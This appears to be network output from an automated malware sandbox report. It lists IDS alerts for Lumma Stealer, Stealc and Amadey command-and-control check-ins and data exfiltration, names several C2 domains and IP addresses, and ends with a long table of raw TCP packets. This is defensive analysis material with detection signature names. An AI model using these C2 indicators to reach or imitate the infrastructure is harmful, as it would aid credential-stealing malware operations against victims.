2024-11-11T10:34:13.843697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50127	188.114.96.3	443	TCP
2024-11-11T10:34:15.206443+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50128	188.114.96.3	443	TCP
2024-11-11T10:34:15.206443+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50128	188.114.96.3	443	TCP
2024-11-11T10:34:16.172383+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50129	185.215.113.43	80	TCP
2024-11-11T10:34:16.413152+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50130	185.215.113.206	80	TCP
2024-11-11T10:34:16.511003+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50131	188.114.96.3	443	TCP
2024-11-11T10:34:16.511003+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50131	188.114.96.3	443	TCP
2024-11-11T10:34:17.830825+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:17.830825+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:18.230564+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:19.247560+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:19.247560+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:19.251567+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:22.433611+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50144	185.215.113.43	80	TCP
2024-11-11T10:34:22.737102+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50146	188.114.96.3	443	TCP
2024-11-11T10:34:22.737102+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50146	188.114.96.3	443	TCP
2024-11-11T10:34:23.086396+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50145	185.215.113.16	80	TCP
2024-11-11T10:34:23.618776+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50148	185.215.113.206	80	TCP
2024-11-11T10:34:25.951411+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	53486	1.1.1.1	53	UDP
2024-11-11T10:34:25.978974+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	65292	1.1.1.1	53	UDP
2024-11-11T10:34:26.005989+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	61173	1.1.1.1	53	UDP
2024-11-11T10:34:26.032049+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	59595	1.1.1.1	53	UDP
2024-11-11T10:34:26.058182+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	65154	1.1.1.1	53	UDP
2024-11-11T10:34:26.082040+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	52363	1.1.1.1	53	UDP
2024-11-11T10:34:26.542043+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:26.542043+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:26.969229+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:26.969229+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50150	188.114.96.3	443	TCP
2024-11-11T10:34:27.012353+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50151	185.215.113.43	80	TCP
2024-11-11T10:34:27.496220+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:27.496220+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:27.855727+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:27.855727+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50152	188.114.96.3	443	TCP
2024-11-11T10:34:29.067290+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50153	188.114.96.3	443	TCP
2024-11-11T10:34:29.067290+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50153	188.114.96.3	443	TCP
2024-11-11T10:34:30.708023+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50155	188.114.96.3	443	TCP
2024-11-11T10:34:30.708023+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50155	188.114.96.3	443	TCP
2024-11-11T10:34:33.677586+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50157	188.114.96.3	443	TCP
2024-11-11T10:34:33.677586+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50157	188.114.96.3	443	TCP
2024-11-11T10:34:35.644574+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50159	185.215.113.206	80	TCP
2024-11-11T10:34:36.720502+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50160	188.114.96.3	443	TCP
2024-11-11T10:34:36.720502+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50160	188.114.96.3	443	TCP
2024-11-11T10:34:38.110600+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:38.110600+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:38.116308+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50162	188.114.96.3	443	TCP
2024-11-11T10:34:39.979610+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:39.979610+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:40.323796+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50164	188.114.96.3	443	TCP
2024-11-11T10:34:45.672604+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50168	185.215.113.206	80	TCP
2024-11-11T10:34:49.899529+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	60714	1.1.1.1	53	UDP
2024-11-11T10:34:49.928323+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	49912	1.1.1.1	53	UDP
2024-11-11T10:34:49.954941+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	64925	1.1.1.1	53	UDP
2024-11-11T10:34:49.977924+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	64007	1.1.1.1	53	UDP
2024-11-11T10:34:50.001465+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	63653	1.1.1.1	53	UDP
2024-11-11T10:34:50.026568+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	64513	1.1.1.1	53	UDP
2024-11-11T10:34:50.489142+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:50.489142+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:50.783923+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:50.783923+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50171	188.114.96.3	443	TCP
2024-11-11T10:34:52.035456+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:52.035456+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:52.391649+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:52.391649+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50173	188.114.96.3	443	TCP
2024-11-11T10:34:53.101604+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50175	188.114.96.3	443	TCP
2024-11-11T10:34:53.101604+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50175	188.114.96.3	443	TCP
2024-11-11T10:34:54.425265+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50176	188.114.96.3	443	TCP
2024-11-11T10:34:54.425265+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50176	188.114.96.3	443	TCP
2024-11-11T10:34:55.744072+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50178	188.114.96.3	443	TCP
2024-11-11T10:34:55.744072+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50178	188.114.96.3	443	TCP
2024-11-11T10:34:57.758297+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50180	188.114.96.3	443	TCP
2024-11-11T10:34:57.758297+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50180	188.114.96.3	443	TCP
2024-11-11T10:34:58.140095+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50180	188.114.96.3	443	TCP
2024-11-11T10:34:59.531358+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50181	188.114.96.3	443	TCP
2024-11-11T10:34:59.531358+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50181	188.114.96.3	443	TCP
2024-11-11T10:34:59.535570+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50181	188.114.96.3	443	TCP
2024-11-11T10:34:59.965623+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50182	185.215.113.206	80	TCP
2024-11-11T10:35:01.448454+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50184	188.114.96.3	443	TCP
2024-11-11T10:35:01.448454+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50184	188.114.96.3	443	TCP
2024-11-11T10:35:01.717513+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50184	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 10:32:55.162544012 CET	49674	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:32:55.381258011 CET	49675	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:32:55.381716967 CET	49673	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:33:01.319987059 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:01.325053930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:01.325124025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:01.325256109 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:01.330013037 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:01.963808060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:01.963867903 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:01.980463982 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:01.985322952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.195960045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.196042061 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.197206020 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.202141047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.399665117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.399683952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.399756908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.399756908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.401012897 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.405929089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.604213953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.604229927 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.604262114 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.604274988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.604321003 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.604357004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.608952045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.608988047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.609000921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.609014988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.609028101 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.609038115 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.609069109 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.610485077 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.615287066 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.811916113 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.811999083 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.828975916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.829006910 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:02.833867073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.833879948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.833898067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.833911896 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.834103107 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.834112883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:02.834153891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:03.591995955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:03.592082024 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.071623087 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.076479912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271266937 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271280050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271292925 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271303892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271322012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271333933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271344900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.271373987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.271423101 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.271919012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272015095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272118092 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.272265911 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272284031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272295952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272316933 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.272351980 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.272648096 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.272696018 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.383835077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.383848906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.383908033 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.383965015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.383975983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.383990049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384010077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384021044 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384048939 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.384078026 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.384682894 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384694099 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384705067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.384732008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.384759903 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385067940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385113955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385130882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385142088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385154009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385166883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385175943 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385206938 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385879993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385929108 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385929108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385941029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.385968924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385986090 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.385992050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386008978 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386037111 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.386058092 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.386809111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386821032 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386831999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386857033 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.386863947 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386874914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.386887074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.386913061 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.496651888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.496666908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.496679068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.496722937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.496767998 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.510730982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510806084 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.510818005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510834932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510845900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510859013 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510870934 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510874987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.510884047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.510895967 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.510912895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.510966063 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.511259079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511269093 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511281013 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511292934 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511303902 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511303902 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.511321068 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.511322021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511334896 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.511346102 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.511364937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.512119055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512135983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512146950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512157917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512165070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.512168884 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512182951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512195110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.512197018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.512217045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.512231112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513005018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513016939 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513027906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513044119 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513055086 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513056040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513067007 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513079882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513081074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513103962 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513113976 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513807058 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513853073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513878107 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513889074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513900042 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513910055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513921976 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513922930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513933897 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.513948917 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.513962030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.514688969 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514699936 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514712095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514744997 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.514765978 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514777899 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514789104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514790058 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.514803886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.514803886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.514830112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.514843941 CET	49704	80	192.168.2.5	185.215.113.206
